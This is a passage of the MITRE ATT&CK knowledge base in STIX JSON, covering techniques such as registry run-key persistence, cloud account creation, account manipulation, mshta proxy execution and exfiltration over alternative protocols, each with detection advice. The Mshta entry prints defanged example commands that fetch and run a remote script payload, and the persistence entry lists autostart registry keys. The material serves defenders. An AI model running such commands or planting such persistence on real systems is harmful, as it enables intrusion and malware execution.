C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run automatically for the currently logged-on user.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Oddvar Moe, @oddvarmoe", "Dray Agha, @Purp1eW0lf, Huntress Labs", "Harun K\u00fc\u00dfner"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "created": "2020-01-23T22:02:48.566Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/001", "external_id": "T1547.001"}, {"source_name": "Malwarebytes Wow6432Node 2016", "description": "Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020.", "url": "https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/"}, {"source_name": "Microsoft Wow6432Node 2018", "description": "Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020.", "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry"}, {"source_name": "Microsoft Run Key", "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.", "url": "http://msdn.microsoft.com/en-us/library/aa376977"}, {"source_name": "Oddvar Moe RunOnceEx Mar 2018", "description": "Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.", "url": "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:08.425Z", "name": "Exploitation for Evasion", "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. \n\nAdversaries may have prior knowledge through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888) about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious [System Firmware](https://attack.mitre.org/techniques/T0857).", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0820", "external_id": "T0820"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Trusted Relationship", "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian", "ExtraHop", "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "SaaS", "IaaS", "Linux", "macOS", "Office 365"], "x_mitre_version": "2.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1199", "external_id": "T1199"}, {"source_name": "CISA IT Service Providers", "description": "CISA. (n.d.). APTs Targeting IT Service Provider Customers. Retrieved November 16, 2020.", "url": "https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers"}, {"source_name": "Office 365 Delegated Administration", "description": "Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.", "url": "https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-28T16:14:28.678Z", "name": "Cloud Account", "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nIn addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.\n\nOnce an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Praetorian", "Microsoft Threat Intelligence Center (MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Azure AD", "Office 365", "IaaS", "Google Workspace", "SaaS"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b", "created": "2020-01-29T17:32:30.711Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1136/003", "external_id": "T1136.003"}, {"source_name": "Microsoft O365 Admin Roles", "description": "Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. al.. (2019, October 8). About admin roles. Retrieved October 18, 2019.", "url": "https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide"}, {"source_name": "AWS Create IAM User", "description": "AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020.", "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html"}, {"source_name": "AWS Lambda Execution Role", "description": "AWS. (n.d.). Lambda execution role. Retrieved February 28, 2024.", "url": "https://docs.aws.amazon.com/lambda/latest/dg/lambda-intro-execution-role.html"}, {"source_name": "AWS Instance Profiles", "description": "AWS. (n.d.). Using instance profiles. Retrieved February 28, 2024.", "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html"}, {"source_name": "GCP Create Cloud Identity Users", "description": "Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020.", "url": "https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554"}, {"source_name": "GCP Service Accounts", "description": "Google. (n.d.). Service Accounts Overview. Retrieved February 28, 2024.", "url": "https://cloud.google.com/iam/docs/service-account-overview"}, {"source_name": "Microsoft Azure AD Users", "description": "Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory"}, {"source_name": "Microsoft Entra ID Service Principals", "description": "Microsoft. (2023, December 15). Application and service principal objects in Microsoft Entra ID. Retrieved February 28, 2024.", "url": "https://learn.microsoft.com/en-us/entra/identity-platform/app-objects-and-service-principals?tabs=browser"}, {"source_name": "Microsoft Support O365 Add Another Admin, October 2019", "description": "Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.", "url": "https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Local Groups", "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Harshal Tupsamudre, Qualys", "Miriam Wiesner, @miriamxyra, Microsoft Security"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "created": "2020-03-12T19:29:21.013Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1069/001", "external_id": "T1069.001"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "LC_MAIN Hijacking", "description": "**This technique has been deprecated and should no longer be used.**\n\nAs of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary\u2019s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn\u2019t know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "2.0", "x_mitre_defense_bypassed": ["Application whitelisting", "Process whitelisting", "Whitelisting by file name or path"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a0a189c8-d3bd-4991-bf6f-153d185ee373", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1149", "external_id": "T1149"}, {"source_name": "Prolific OSX Malware History", "description": "Bit9 + Carbon Black Threat Research Team. (2015). 2015: The Most Prolific Year in History for OS X Malware. Retrieved July 8, 2017.", "url": "https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-10-18T22:48:33.286Z", "name": "Search Open Websites/Domains", "description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", "created": "2020-10-02T16:48:04.509Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1593", "external_id": "T1593"}, {"source_name": "SecurityTrails Google Hacking", "description": "Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.", "url": "https://securitytrails.com/blog/google-hacking-techniques"}, {"source_name": "Cyware Social Media", "description": "Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.", "url": "https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e"}, {"source_name": "ExploitDB GoogleHacking", "description": "Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020.", "url": "https://www.exploit-db.com/google-hacking-database"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-01-16T22:24:38.234Z", "name": "Account Manipulation", "description": "Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. \n\nIn order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)", "Praetorian", "Tim MalcomVetter", "Wojciech Lesicki", "Arad Inbar, Fidelis Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "IaaS", "Linux", "macOS", "Google Workspace", "SaaS", "Network", "Containers"], "x_mitre_version": "2.6", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "created": "2017-05-31T21:31:12.196Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1098", "external_id": "T1098"}, {"source_name": "FireEye SMOKEDHAM June 2021", "description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate\u2019s Supply Chain Software Compromise. Retrieved September 22, 2021.", "url": "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html"}, {"source_name": "Microsoft Security Event 4670", "description": "Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.", "url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670"}, {"source_name": "Microsoft User Modified Event", "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738"}, {"source_name": "InsiderThreat ChangeNTLM July 2017", "description": "Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.", "url": "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM"}, {"source_name": "GitHub Mimikatz Issue 92 June 2017", "description": "Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm work, but generate Windows events #92. Retrieved December 4, 2017.", "url": "https://github.com/gentilkiwi/mimikatz/issues/92"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Mshta", "description": "Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nAdversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ricardo Dias", "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"], "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the binary being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_defense_bypassed": ["Application whitelisting", "Digital Certificate Validation"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a127c32c-cbb0-4f9d-be07-881a792408ec", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1170", "external_id": "T1170"}, {"source_name": "Wikipedia HTML Application", "description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.", "url": "https://en.wikipedia.org/wiki/HTML_Application"}, {"source_name": "MSDN HTML Applications", "description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.", "url": "https://msdn.microsoft.com/library/ms536471.aspx"}, {"source_name": "Cylance Dust Storm", "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf"}, {"source_name": "Red Canary HTA Abuse Part Deux", "description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.", "url": "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/"}, {"source_name": "FireEye Attacks Leveraging HTA", "description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html"}, {"source_name": "Airbus Security Kovter Analysis", "description": "Dove, A. (2016, March 23). Fileless Malware \u2013 A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.", "url": "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/"}, {"source_name": "FireEye FIN7 April 2017", "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"}, {"source_name": "LOLBAS Mshta", "description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Mshta/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Exfiltration Over Alternative Protocol", "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, 